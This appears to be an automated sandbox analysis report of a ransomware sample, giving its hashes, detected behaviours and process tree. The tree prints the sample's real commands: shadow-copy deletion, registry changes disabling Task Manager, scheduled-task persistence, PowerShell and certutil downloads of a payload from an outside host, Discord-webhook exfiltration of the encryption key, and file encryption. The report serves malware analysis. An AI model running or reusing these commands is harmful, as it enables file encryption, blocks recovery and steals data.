Analysis
-
max time kernel
125s -
max time network
94s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
18-02-2021 08:52
Static task
static1
Behavioral task
behavioral1
Sample
RenderGraphics.bin.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
RenderGraphics.bin.exe
Resource
win10v20201028
General
-
Target
RenderGraphics.bin.exe
-
Size
1006KB
-
MD5
46a1769d81d7dcda455f0f05b9b29648
-
SHA1
4d56dffea9d04ee8ed174f1b3328675daf4be7b1
-
SHA256
9e4f1334d3712298cb3d18e38cd954c893c890d09ad457683c8d7956a9bdb635
-
SHA512
8c8ed91b996f84807be1337fe770db4eadd0a7da00fe0545f6de86bd577054dc9a3df22cd81e25ffb4f1ea3e7642409ff9e01a57c582abb099719b069c9fc193
Malware Config
Extracted
https://cdn-35.anonfiles.com/9821W1G5p3/8a0b1f8a-1613613819/gameover.exe
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exepowershell.exeflow pid process 9 1036 powershell.exe 11 1668 powershell.exe -
Disables Task Manager via registry modification
-
Executes dropped EXE 64 IoCs
Processes:
DiscordSendWebhook.exeextd.exeDiscordSendWebhook.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exepid process 1448 DiscordSendWebhook.exe 936 extd.exe 224 DiscordSendWebhook.exe 1652 aescrypt.exe 1732 aescrypt.exe 2004 aescrypt.exe 936 aescrypt.exe 1320 aescrypt.exe 2008 aescrypt.exe 1868 aescrypt.exe 1616 aescrypt.exe 1832 aescrypt.exe 616 aescrypt.exe 1056 aescrypt.exe 680 aescrypt.exe 1604 aescrypt.exe 740 aescrypt.exe 1344 aescrypt.exe 1500 aescrypt.exe 1396 aescrypt.exe 1380 aescrypt.exe 2032 aescrypt.exe 1496 aescrypt.exe 520 aescrypt.exe 1036 aescrypt.exe 2016 aescrypt.exe 1344 aescrypt.exe 316 aescrypt.exe 204 aescrypt.exe 1860 aescrypt.exe 1840 aescrypt.exe 1512 aescrypt.exe 1884 aescrypt.exe 1576 aescrypt.exe 1056 aescrypt.exe 1876 aescrypt.exe 224 aescrypt.exe 916 aescrypt.exe 1044 aescrypt.exe 956 aescrypt.exe 2000 aescrypt.exe 620 aescrypt.exe 220 aescrypt.exe 1352 aescrypt.exe 1620 aescrypt.exe 1652 aescrypt.exe 680 aescrypt.exe 1732 aescrypt.exe 520 aescrypt.exe 816 aescrypt.exe 1604 aescrypt.exe 1344 aescrypt.exe 1616 aescrypt.exe 2028 aescrypt.exe 956 aescrypt.exe 2000 aescrypt.exe 1032 aescrypt.exe 1916 aescrypt.exe 1120 aescrypt.exe 908 aescrypt.exe 1672 aescrypt.exe 940 aescrypt.exe 2004 aescrypt.exe 1036 aescrypt.exe -
Modifies extensions of user files 24 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
aescrypt.exeaescrypt.exeattrib.exeaescrypt.exeaescrypt.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeaescrypt.exeaescrypt.exeattrib.exeaescrypt.exeaescrypt.exeattrib.exeaescrypt.exeattrib.exeaescrypt.exeaescrypt.exeattrib.exeaescrypt.exeattrib.exeattrib.exedescription ioc process File created C:\Users\Admin\Pictures\WatchHide.tif.lck aescrypt.exe File created C:\Users\Admin\Pictures\ReadRegister.tiff.lck aescrypt.exe File opened for modification C:\Users\Admin\Pictures\ReadRegister.tiff.lck attrib.exe File created C:\Users\Admin\Pictures\GrantFind.png.lck aescrypt.exe File created C:\Users\Admin\Pictures\RepairSearch.crw.lck aescrypt.exe File opened for modification C:\Users\Admin\Pictures\RepairSearch.crw.lck attrib.exe File opened for modification C:\Users\Admin\Pictures\GetFind.png.lck attrib.exe File opened for modification C:\Users\Admin\Pictures\TraceStop.raw.lck attrib.exe File opened for modification C:\Users\Admin\Pictures\WatchHide.tif.lck attrib.exe File opened for modification C:\Users\Admin\Pictures\SwitchRestart.tif.lck attrib.exe File created C:\Users\Admin\Pictures\OutInitialize.crw.lck aescrypt.exe File created C:\Users\Admin\Pictures\RenameTest.raw.lck aescrypt.exe File opened for modification C:\Users\Admin\Pictures\SyncOpen.png.lck attrib.exe File created C:\Users\Admin\Pictures\SwitchRestart.tif.lck aescrypt.exe File created C:\Users\Admin\Pictures\ResumeSync.crw.lck aescrypt.exe File opened for modification C:\Users\Admin\Pictures\ResumeSync.crw.lck attrib.exe File created C:\Users\Admin\Pictures\GetFind.png.lck aescrypt.exe File opened for modification C:\Users\Admin\Pictures\RenameTest.raw.lck attrib.exe File created C:\Users\Admin\Pictures\SyncOpen.png.lck aescrypt.exe File created C:\Users\Admin\Pictures\TraceStop.raw.lck aescrypt.exe File opened for modification C:\Users\Admin\Pictures\OutInitialize.crw.lck attrib.exe File created C:\Users\Admin\Pictures\InitializeConvert.tiff.lck aescrypt.exe File opened for modification C:\Users\Admin\Pictures\InitializeConvert.tiff.lck attrib.exe File opened for modification C:\Users\Admin\Pictures\GrantFind.png.lck attrib.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\50AF.tmp\50B0.tmp\extd.exe upx C:\Users\Admin\AppData\Local\Temp\50AF.tmp\50B0.tmp\extd.exe upx -
Drops startup file 2 IoCs
Processes:
cmd.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RenderGraphics.bin.exe cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RenderGraphics.bin.exe cmd.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 684 vssadmin.exe -
Kills process with taskkill 4 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 2016 taskkill.exe 560 taskkill.exe 680 taskkill.exe 1732 taskkill.exe -
Modifies Control Panel 2 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Control Panel\Mouse\SwapMouseButtons = "1" reg.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Control Panel\Mouse reg.exe -
Modifies registry class 2 IoCs
Processes:
rundll32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\MuiCache rundll32.exe -
Opens file in notepad (likely ransom note) 4 IoCs
Processes:
NOTEPAD.EXENOTEPAD.EXENOTEPAD.EXENOTEPAD.EXEpid process 560 NOTEPAD.EXE 820 NOTEPAD.EXE 1632 NOTEPAD.EXE 224 NOTEPAD.EXE -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 5 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 25 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: CmdExeWriteProcessMemorySpam 64 IoCs
Processes:
DiscordSendWebhook.exeextd.exeDiscordSendWebhook.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exepid process 1448 DiscordSendWebhook.exe 936 extd.exe 224 DiscordSendWebhook.exe 1652 aescrypt.exe 1732 aescrypt.exe 2004 aescrypt.exe 936 aescrypt.exe 1320 aescrypt.exe 2008 aescrypt.exe 1868 aescrypt.exe 1616 aescrypt.exe 1832 aescrypt.exe 616 aescrypt.exe 1056 aescrypt.exe 680 aescrypt.exe 1604 aescrypt.exe 740 aescrypt.exe 1344 aescrypt.exe 1500 aescrypt.exe 1396 aescrypt.exe 1380 aescrypt.exe 2032 aescrypt.exe 1496 aescrypt.exe 520 aescrypt.exe 1036 aescrypt.exe 2016 aescrypt.exe 1344 aescrypt.exe 316 aescrypt.exe 204 aescrypt.exe 1860 aescrypt.exe 1840 aescrypt.exe 1512 aescrypt.exe 1884 aescrypt.exe 1576 aescrypt.exe 1056 aescrypt.exe 1876 aescrypt.exe 224 aescrypt.exe 916 aescrypt.exe 1044 aescrypt.exe 956 aescrypt.exe 2000 aescrypt.exe 620 aescrypt.exe 220 aescrypt.exe 1352 aescrypt.exe 1620 aescrypt.exe 1652 aescrypt.exe 680 aescrypt.exe 1732 aescrypt.exe 520 aescrypt.exe 816 aescrypt.exe 1604 aescrypt.exe 1344 aescrypt.exe 1616 aescrypt.exe 2028 aescrypt.exe 956 aescrypt.exe 2000 aescrypt.exe 1032 aescrypt.exe 1916 aescrypt.exe 1120 aescrypt.exe 908 aescrypt.exe 1672 aescrypt.exe 940 aescrypt.exe 2004 aescrypt.exe 1036 aescrypt.exe -
Suspicious behavior: EnumeratesProcesses 22 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1120 powershell.exe 1120 powershell.exe 1036 powershell.exe 1036 powershell.exe 1668 powershell.exe 1668 powershell.exe 616 powershell.exe 616 powershell.exe 1500 powershell.exe 1500 powershell.exe 960 powershell.exe 960 powershell.exe 740 powershell.exe 740 powershell.exe 1120 powershell.exe 1120 powershell.exe 1036 powershell.exe 1036 powershell.exe 1868 powershell.exe 1868 powershell.exe 960 powershell.exe 960 powershell.exe -
Suspicious use of AdjustPrivilegeToken 62 IoCs
Processes:
WMIC.exevssvc.exepowershell.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe7zG.exedescription pid process Token: SeIncreaseQuotaPrivilege 1560 WMIC.exe Token: SeSecurityPrivilege 1560 WMIC.exe Token: SeTakeOwnershipPrivilege 1560 WMIC.exe Token: SeLoadDriverPrivilege 1560 WMIC.exe Token: SeSystemProfilePrivilege 1560 WMIC.exe Token: SeSystemtimePrivilege 1560 WMIC.exe Token: SeProfSingleProcessPrivilege 1560 WMIC.exe Token: SeIncBasePriorityPrivilege 1560 WMIC.exe Token: SeCreatePagefilePrivilege 1560 WMIC.exe Token: SeBackupPrivilege 1560 WMIC.exe Token: SeRestorePrivilege 1560 WMIC.exe Token: SeShutdownPrivilege 1560 WMIC.exe Token: SeDebugPrivilege 1560 WMIC.exe Token: SeSystemEnvironmentPrivilege 1560 WMIC.exe Token: SeRemoteShutdownPrivilege 1560 WMIC.exe Token: SeUndockPrivilege 1560 WMIC.exe Token: SeManageVolumePrivilege 1560 WMIC.exe Token: 33 1560 WMIC.exe Token: 34 1560 WMIC.exe Token: 35 1560 WMIC.exe Token: SeIncreaseQuotaPrivilege 1560 WMIC.exe Token: SeSecurityPrivilege 1560 WMIC.exe Token: SeTakeOwnershipPrivilege 1560 WMIC.exe Token: SeLoadDriverPrivilege 1560 WMIC.exe Token: SeSystemProfilePrivilege 1560 WMIC.exe Token: SeSystemtimePrivilege 1560 WMIC.exe Token: SeProfSingleProcessPrivilege 1560 WMIC.exe Token: SeIncBasePriorityPrivilege 1560 WMIC.exe Token: SeCreatePagefilePrivilege 1560 WMIC.exe Token: SeBackupPrivilege 1560 WMIC.exe Token: SeRestorePrivilege 1560 WMIC.exe Token: SeShutdownPrivilege 1560 WMIC.exe Token: SeDebugPrivilege 1560 WMIC.exe Token: SeSystemEnvironmentPrivilege 1560 WMIC.exe Token: SeRemoteShutdownPrivilege 1560 WMIC.exe Token: SeUndockPrivilege 1560 WMIC.exe Token: SeManageVolumePrivilege 1560 WMIC.exe Token: 33 1560 WMIC.exe Token: 34 1560 WMIC.exe Token: 35 1560 WMIC.exe Token: SeBackupPrivilege 1164 vssvc.exe Token: SeRestorePrivilege 1164 vssvc.exe Token: SeAuditPrivilege 1164 vssvc.exe Token: SeDebugPrivilege 1120 powershell.exe Token: SeDebugPrivilege 2016 taskkill.exe Token: SeDebugPrivilege 560 taskkill.exe Token: SeDebugPrivilege 680 taskkill.exe Token: SeDebugPrivilege 1732 taskkill.exe Token: SeDebugPrivilege 1036 powershell.exe Token: SeDebugPrivilege 1668 powershell.exe Token: SeDebugPrivilege 616 powershell.exe Token: SeDebugPrivilege 1500 powershell.exe Token: SeDebugPrivilege 960 powershell.exe Token: SeDebugPrivilege 740 powershell.exe Token: SeDebugPrivilege 1120 powershell.exe Token: SeDebugPrivilege 1036 powershell.exe Token: SeDebugPrivilege 1868 powershell.exe Token: SeDebugPrivilege 960 powershell.exe Token: SeRestorePrivilege 1100 7zG.exe Token: 35 1100 7zG.exe Token: SeSecurityPrivilege 1100 7zG.exe Token: SeSecurityPrivilege 1100 7zG.exe -
Suspicious use of FindShellTrayWindow 8 IoCs
Processes:
DiscordSendWebhook.exeDiscordSendWebhook.exe7zG.exepid process 1448 DiscordSendWebhook.exe 1448 DiscordSendWebhook.exe 1448 DiscordSendWebhook.exe 1448 DiscordSendWebhook.exe 224 DiscordSendWebhook.exe 224 DiscordSendWebhook.exe 224 DiscordSendWebhook.exe 1100 7zG.exe -
Suspicious use of SendNotifyMessage 7 IoCs
Processes:
DiscordSendWebhook.exeDiscordSendWebhook.exepid process 1448 DiscordSendWebhook.exe 1448 DiscordSendWebhook.exe 1448 DiscordSendWebhook.exe 1448 DiscordSendWebhook.exe 224 DiscordSendWebhook.exe 224 DiscordSendWebhook.exe 224 DiscordSendWebhook.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
RenderGraphics.bin.execmd.exedescription pid process target process PID 1864 wrote to memory of 1340 1864 RenderGraphics.bin.exe cmd.exe PID 1864 wrote to memory of 1340 1864 RenderGraphics.bin.exe cmd.exe PID 1864 wrote to memory of 1340 1864 RenderGraphics.bin.exe cmd.exe PID 1864 wrote to memory of 1340 1864 RenderGraphics.bin.exe cmd.exe PID 1340 wrote to memory of 1560 1340 cmd.exe WMIC.exe PID 1340 wrote to memory of 1560 1340 cmd.exe WMIC.exe PID 1340 wrote to memory of 1560 1340 cmd.exe WMIC.exe PID 1340 wrote to memory of 684 1340 cmd.exe vssadmin.exe PID 1340 wrote to memory of 684 1340 cmd.exe vssadmin.exe PID 1340 wrote to memory of 684 1340 cmd.exe vssadmin.exe PID 1340 wrote to memory of 1172 1340 cmd.exe reg.exe PID 1340 wrote to memory of 1172 1340 cmd.exe reg.exe PID 1340 wrote to memory of 1172 1340 cmd.exe reg.exe PID 1340 wrote to memory of 1840 1340 cmd.exe reg.exe PID 1340 wrote to memory of 1840 1340 cmd.exe reg.exe PID 1340 wrote to memory of 1840 1340 cmd.exe reg.exe PID 1340 wrote to memory of 1984 1340 cmd.exe reg.exe PID 1340 wrote to memory of 1984 1340 cmd.exe reg.exe PID 1340 wrote to memory of 1984 1340 cmd.exe reg.exe PID 1340 wrote to memory of 1732 1340 cmd.exe reg.exe PID 1340 wrote to memory of 1732 1340 cmd.exe reg.exe PID 1340 wrote to memory of 1732 1340 cmd.exe reg.exe PID 1340 wrote to memory of 1860 1340 cmd.exe reg.exe PID 1340 wrote to memory of 1860 1340 cmd.exe reg.exe PID 1340 wrote to memory of 1860 1340 cmd.exe reg.exe PID 1340 wrote to memory of 1832 1340 cmd.exe reg.exe PID 1340 wrote to memory of 1832 1340 cmd.exe reg.exe PID 1340 wrote to memory of 1832 1340 cmd.exe reg.exe PID 1340 wrote to memory of 1028 1340 cmd.exe attrib.exe PID 1340 wrote to memory of 1028 1340 cmd.exe attrib.exe PID 1340 wrote to memory of 1028 1340 cmd.exe attrib.exe PID 1340 wrote to memory of 1036 1340 cmd.exe attrib.exe PID 1340 wrote to memory of 1036 1340 cmd.exe attrib.exe PID 1340 wrote to memory of 1036 1340 cmd.exe attrib.exe PID 1340 wrote to memory of 1272 1340 cmd.exe attrib.exe PID 1340 wrote to memory of 1272 1340 cmd.exe attrib.exe PID 1340 wrote to memory of 1272 1340 cmd.exe attrib.exe PID 1340 wrote to memory of 1448 1340 cmd.exe DiscordSendWebhook.exe PID 1340 wrote to memory of 1448 1340 cmd.exe DiscordSendWebhook.exe PID 1340 wrote to memory of 1448 1340 cmd.exe DiscordSendWebhook.exe PID 1340 wrote to memory of 1448 1340 cmd.exe DiscordSendWebhook.exe PID 1340 wrote to memory of 1120 1340 cmd.exe powershell.exe PID 1340 wrote to memory of 1120 1340 cmd.exe powershell.exe PID 1340 wrote to memory of 1120 1340 cmd.exe powershell.exe PID 1340 wrote to memory of 2016 1340 cmd.exe taskkill.exe PID 1340 wrote to memory of 2016 1340 cmd.exe taskkill.exe PID 1340 wrote to memory of 2016 1340 cmd.exe taskkill.exe PID 1340 wrote to memory of 560 1340 cmd.exe taskkill.exe PID 1340 wrote to memory of 560 1340 cmd.exe taskkill.exe PID 1340 wrote to memory of 560 1340 cmd.exe taskkill.exe PID 1340 wrote to memory of 680 1340 cmd.exe taskkill.exe PID 1340 wrote to memory of 680 1340 cmd.exe taskkill.exe PID 1340 wrote to memory of 680 1340 cmd.exe taskkill.exe PID 1340 wrote to memory of 1732 1340 cmd.exe taskkill.exe PID 1340 wrote to memory of 1732 1340 cmd.exe taskkill.exe PID 1340 wrote to memory of 1732 1340 cmd.exe taskkill.exe PID 1340 wrote to memory of 1032 1340 cmd.exe schtasks.exe PID 1340 wrote to memory of 1032 1340 cmd.exe schtasks.exe PID 1340 wrote to memory of 1032 1340 cmd.exe schtasks.exe PID 1340 wrote to memory of 1036 1340 cmd.exe powershell.exe PID 1340 wrote to memory of 1036 1340 cmd.exe powershell.exe PID 1340 wrote to memory of 1036 1340 cmd.exe powershell.exe PID 1340 wrote to memory of 1668 1340 cmd.exe powershell.exe PID 1340 wrote to memory of 1668 1340 cmd.exe powershell.exe -
Views/modifies file attributes 1 TTPs 64 IoCs
Processes:
attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exepid process 1924 attrib.exe 1884 attrib.exe 208 attrib.exe 1352 attrib.exe 1348 attrib.exe 1120 attrib.exe 1320 attrib.exe 1616 attrib.exe 1512 attrib.exe 1860 attrib.exe 1840 attrib.exe 1328 attrib.exe 1576 attrib.exe 1840 attrib.exe 940 attrib.exe 1996 attrib.exe 1576 attrib.exe 680 attrib.exe 1448 attrib.exe 1328 attrib.exe 204 attrib.exe 1036 attrib.exe 2016 attrib.exe 1028 attrib.exe 1056 attrib.exe 544 attrib.exe 1512 attrib.exe 816 attrib.exe 1672 attrib.exe 1604 attrib.exe 1668 attrib.exe 208 attrib.exe 1840 attrib.exe 236 attrib.exe 1272 attrib.exe 620 attrib.exe 816 attrib.exe 916 attrib.exe 1860 attrib.exe 960 attrib.exe 1840 attrib.exe 1840 attrib.exe 1500 attrib.exe 936 attrib.exe 908 attrib.exe 1320 attrib.exe 1344 attrib.exe 220 attrib.exe 1620 attrib.exe 1036 attrib.exe 940 attrib.exe 224 attrib.exe 2028 attrib.exe 204 attrib.exe 544 attrib.exe 1876 attrib.exe 224 attrib.exe 1672 attrib.exe 2028 attrib.exe 1056 attrib.exe 740 attrib.exe 1120 attrib.exe 916 attrib.exe 1352 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\RenderGraphics.bin.exe"C:\Users\Admin\AppData\Local\Temp\RenderGraphics.bin.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\50AF.tmp\50B0.tmp\50C1.bat C:\Users\Admin\AppData\Local\Temp\RenderGraphics.bin.exe"2⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:643⤵
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Control Panel\Mouse" /v SwapMouseButtons /t REG_SZ /d "1" /f3⤵
- Modifies Control Panel
-
C:\Windows\system32\attrib.exeattrib +r +s +h C:\Users\Admin\AppData\Local\Temp\RenderGraphics.bin.exe3⤵
-
C:\Windows\system32\attrib.exeattrib +r +s +h "C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"3⤵
- Views/modifies file attributes
-
C:\Windows\system32\attrib.exeattrib +r +s +h "C:\Users\Admin\AppData\Local\Temp\50AF.tmp\DiscordSendWebhook.exe"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\DiscordSendWebhook.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\DiscordSendWebhook" -m ":writing_hand: LEAKGAP: Crypting Files..." -w https://discord.com/api/webhooks/807704589436452915/jhcjthfZ4SBzzZNBbqZ9xII5kv9CycOOacxLmktf6BQQn-FYteG1I-Ntg02B-4UphE4K3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell start -verb runas cmd.exe -ArgumentList "/c kill.bat" -filepath "C:\Users\Admin\AppData\Local\Temp" -WindowStyle hidden3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /f /im opera.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /f /im chrome.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /f /im firefox.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /f /im iexplore.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exeschtasks /create /sc onlogon /tn UpdateWuauclt /rl highest /tr "C:\Users\Admin\AppData\Local\Temp\RenderGraphics.bin.exe" /RU "SYSTEM" /f3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -c (new-object System.Net.WebClient).DownloadFile('https://cdn-35.anonfiles.com/9821W1G5p3/8a0b1f8a-1613613819/gameover.exe','C:\Users\Admin\AppData\Local\Temp\final.exe')3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -c Invoke-WebRequest -Uri https://cdn-35.anonfiles.com/9821W1G5p3/8a0b1f8a-1613613819/gameover.exe -OutFile C:\Users\Admin\AppData\Local\Temp\final.exe3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\certutil.execertutil -urlcache -split -f https://cdn-35.anonfiles.com/9821W1G5p3/8a0b1f8a-1613613819/gameover.exe C:\Users\Admin\AppData\Local\Temp\final.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\50B0.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\50AF.tmp\50B0.tmp\extd.exe "/download" "https://cdn-35.anonfiles.com/9821W1G5p3/8a0b1f8a-1613613819/gameover.exe" "C:\Users\Admin\AppData\Local\Temp\final.exe" "" "" "" "" "" ""3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\schtasks.exeschtasks /create /sc DAILY /tn UpdateWuaucltHelper /rl highest /tr "C:\Users\Admin\AppData\Local\Temp\final.exe" /RU "SYSTEM" /MO 53⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\DiscordSendWebhook.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\DiscordSendWebhook" -m ":satellite: LEAKGAP: Info from Admin, Password: kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh, FakeAccount: BUqT8JXD7pI90Dz17V9SNhEUk8qVQ8khPH2rP, PersonalKey:||RSLgNRKl0oUE979LWZaRUh4MpMfNOD6SN4l0sOa||" -w https://discord.com/api/webhooks/807704589436452915/jhcjthfZ4SBzzZNBbqZ9xII5kv9CycOOacxLmktf6BQQn-FYteG1I-Ntg02B-4UphE4K3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell start-process -verb runas -FilePath "C:\Users\Admin\AppData\Local\Temp\final.exe" -WindowStyle hidden3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\attrib.exeattrib +r +s +h C:\Users\Admin\AppData\Local\Temp /s /D3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "desktop.ini.lck" "desktop.ini"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "desktop.ini.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ReadRequest.midi.lck" "ReadRequest.midi"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
